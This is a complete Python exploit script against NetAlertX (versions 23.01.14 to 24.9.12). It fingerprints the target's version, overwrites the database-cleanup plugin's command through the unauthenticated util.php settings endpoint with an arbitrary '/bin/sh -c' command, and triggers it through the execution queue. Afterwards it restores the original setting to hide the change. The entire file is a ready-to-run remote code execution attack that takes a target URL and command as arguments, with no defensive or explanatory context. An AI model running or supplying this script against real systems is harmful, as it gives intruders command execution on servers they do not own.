import requests import json import uuid import time import argparse import sys import re class NetAlertXExploit: def __init__(self, target_url, cmd): self.target_url = target_url.rstrip('/') self.cmd = f"/bin/sh -c {cmd}" self.session = requests.Session() def check_version(self): """Checks if the target is running a vulnerable version of NetAlertX.""" try: res = self.session.get(f"{self.target_url}/maintenance.php", timeout=10) if res.status_code != 200: return False # Regex to find version in the HTML version_match = re.search(r'Installed version.*?v?(\d+\.\d+\.\d+)', res.text, re.S) if not version_match: return False version = version_match.group(1) # Vulnerable range: 23.01.14 to 24.9.12 # Splitting by '.' to do a proper numeric comparison v_parts = [int(p) for p in version.split('.')] if (v_parts >= [23, 1, 14]) and (v_parts <= [24, 9, 12]): print(f"[*] Detected Version: {version} (Vulnerable)") return True print(f"[*] Detected Version: {version} (Not in vulnerable range)") return False except Exception: return False def update_settings(self, cmd_val, schedule_val): url = f"{self.target_url}/php/server/util.php" settings_payload = [ ["DBCLNP", "DBCLNP_RUN", "string", "schedule"], ["DBCLNP", "DBCLNP_CMD", "string", cmd_val], ["DBCLNP", "DBCLNP_RUN_SCHD", "string", f"{schedule_val} * * * *"] ] data = {'function': 'savesettings', 'settings': json.dumps(settings_payload)} res = self.session.post(url, data=data) return res.status_code == 200 def check_settings_applied(self): url = f"{self.target_url}/api/table_settings.json" try: res = self.session.get(url) if res.status_code == 200: data = res.json().get('data', []) return any(row.get('Code_Name') == 'DBCLNP_CMD' and row.get('Value') == self.cmd for row in data) except: pass return False def add_to_queue(self, task_cmd): url = f"{self.target_url}/php/server/util.php" data = {'function': 'addToExecutionQueue', 'action': f"{uuid.uuid4()}|{task_cmd}"} res = self.session.post(url, data=data) return res.status_code == 200 def run(self, wait_time=75, cleanup=True): print(f"[*] Testing: {self.target_url}") # New Strict Version Check if not self.check_version(): print("[-] Sorry, target not vulnerable. Stopping.") sys.exit(0) if not self.update_settings(self.cmd, '*'): print("[-] Failed to update settings.") return print(f"[*] Waiting for settings to sync...") start_time = time.time() applied = False while time.time() - start_time < wait_time: if self.check_settings_applied(): applied = True print("[+] Settings verified.") break time.sleep(5) if applied: print("[*] Triggering execution...") self.add_to_queue('run|DBCLNP') self.add_to_queue('cron_restart_backend') print("[+] Exploit sent.") if cleanup: print("[*] Cleaning up...") original_cmd = 'python3 /app/front/plugins/db_cleanup/script.py pluginskeephistory={pluginskeephistory} hourstokeepnewdevice={hourstokeepnewdevice} daystokeepevents={daystokeepevents} pholuskeepdays={pholuskeepdays}' self.update_settings(original_cmd, '*/30') else: print("[-] Failed to verify settings in time.") if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", required=True) parser.add_argument("-c", "--command", required=True) args = parser.parse_args() exploit = NetAlertXExploit(args.url, args.command) exploit.run()